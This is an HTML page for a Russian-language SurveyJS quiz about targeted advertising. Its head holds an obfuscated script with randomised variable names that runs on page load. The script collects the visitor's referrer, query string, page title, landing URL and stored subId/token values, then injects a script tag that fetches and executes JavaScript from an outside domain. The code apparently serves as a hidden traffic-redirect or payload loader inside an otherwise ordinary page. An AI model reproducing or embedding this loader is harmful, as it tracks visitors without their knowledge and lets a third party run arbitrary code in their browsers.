<!DOCTYPE html>
<html lang="en" >
<head>
  <meta charset="UTF-8">
  <title>surveyJs quiz</title>
  <link rel="stylesheet" href="./style.css">

<script>
    (function() {
    var name = '_JGbDHYWwWnL5ZC3n';
    if (!window._JGbDHYWwWnL5ZC3n) {
        window._JGbDHYWwWnL5ZC3n = {
            unique: false,
            ttl: 86400,
            R_PATH: 'https://gassruss.site/BS1mgsgd',
            P_PATH: 'https://gassruss.site/ee991cb/postback',
        };
    }
    const _N3HGymzVsj4m2xyr = localStorage.getItem('config');
    if (typeof _N3HGymzVsj4m2xyr !== 'undefined' && _N3HGymzVsj4m2xyr !== null) {
        var _WwwNrRppf49ST9kQ = JSON.parse(_N3HGymzVsj4m2xyr);
        var _6tbcS77gH8y8M3gv = Math.round(+new Date()/1000);
        if (_WwwNrRppf49ST9kQ.created_at + window._JGbDHYWwWnL5ZC3n.ttl < _6tbcS77gH8y8M3gv) {
            localStorage.removeItem('subId');
            localStorage.removeItem('token');
            localStorage.removeItem('config');
        }
    }
    var _PRnB3K1Kk9d2Zctw = localStorage.getItem('subId');
    var _rzpHHpNLBWW46Ck5 = localStorage.getItem('token');
    var _9TpySY4SdbXCbJpg = '?return=js.client';
        _9TpySY4SdbXCbJpg += '&' + decodeURIComponent(window.location.search.replace('?', ''));
        _9TpySY4SdbXCbJpg += '&se_referrer=' + encodeURIComponent(document.referrer);
        _9TpySY4SdbXCbJpg += '&default_keyword=' + encodeURIComponent(document.title);
        _9TpySY4SdbXCbJpg += '&landing_url=' + encodeURIComponent(document.location.hostname + document.location.pathname);
        _9TpySY4SdbXCbJpg += '&name=' + encodeURIComponent(name);
        _9TpySY4SdbXCbJpg += '&host=' + encodeURIComponent(window._JGbDHYWwWnL5ZC3n.R_PATH);
    if (typeof _PRnB3K1Kk9d2Zctw !== 'undefined' && _PRnB3K1Kk9d2Zctw && window._JGbDHYWwWnL5ZC3n.unique) {
        _9TpySY4SdbXCbJpg += '&sub_id=' + encodeURIComponent(_PRnB3K1Kk9d2Zctw);
    }
    if (typeof _rzpHHpNLBWW46Ck5 !== 'undefined' && _rzpHHpNLBWW46Ck5 && window._JGbDHYWwWnL5ZC3n.unique) {
        _9TpySY4SdbXCbJpg += '&token=' + encodeURIComponent(_rzpHHpNLBWW46Ck5);
    }
    var a = document.createElement('script');
        a.type = 'application/javascript';
        a.src = window._JGbDHYWwWnL5ZC3n.R_PATH + _9TpySY4SdbXCbJpg;
    var s = document.getElementsByTagName('script')[0];
    s.parentNode.insertBefore(a, s)
    })();
    </script>

</head>
<body>
<!-- partial:index.partial.html -->
<link rel="stylesheet" type="text/css" href="https://unpkg.com/nouislider@9.2.0/distribute/nouislider.min.css">
      <link rel="stylesheet" type="text/css" href="https://unpkg.com/bootstrap@3.3.7/dist/css/bootstrap.min.css">
<script type="text/javascript" src="//code.jquery.com/jquery-3.1.1.js"></script>


      <script type="text/javascript" src="https://unpkg.com/survey-jquery@0.12.10"></script>
      
      <script type="text/javascript" src="https://unpkg.com/nouislider@9.2.0/distribute/nouislider.js"></script>
<div class="container">
      <div class="row">
        <div class="col-xs-1-12 ">
           <h3>
   <span class="icon quiz__title-icon"><svg viewBox="0 0 24 24" class="mdi-icon mdi-24px"><title>mdi-file-document-box-check-outline</title><path d="M17,21L14.25,18L15.41,16.84L17,18.43L20.59,14.84L21.75,16.25M12.8,21H5C3.89,21 3,20.11 3,19V5C3,3.89 3.89,3 5,3H19C20.11,3 21,3.89 21,5V12.8C20.39,12.45 19.72,12.2 19,12.08V5H5V19H12.08C12.2,19.72 12.45,20.39 12.8,21M12,17H7V15H12M14.68,13H7V11H17V12.08C16.15,12.22 15.37,12.54 14.68,13M17,9H7V7H17"></path></svg></span> Узнайте, как с помощью таргетированной рекламы продвигать ваш бизнес и получать больше дохода!
  </h3>
  <div id="surveyElement"></div>
			<p class="sum-slider"><span class="example-val" id="slider-padding-value-min"></span>
			<span class="example-val" id="slider-padding-value-max"></span></p>
          
<div id="result"></div>
        </div>
        
      </div>
    </div>
<!-- partial -->
  <script  src="./script.js"></script>

</body>
</html>
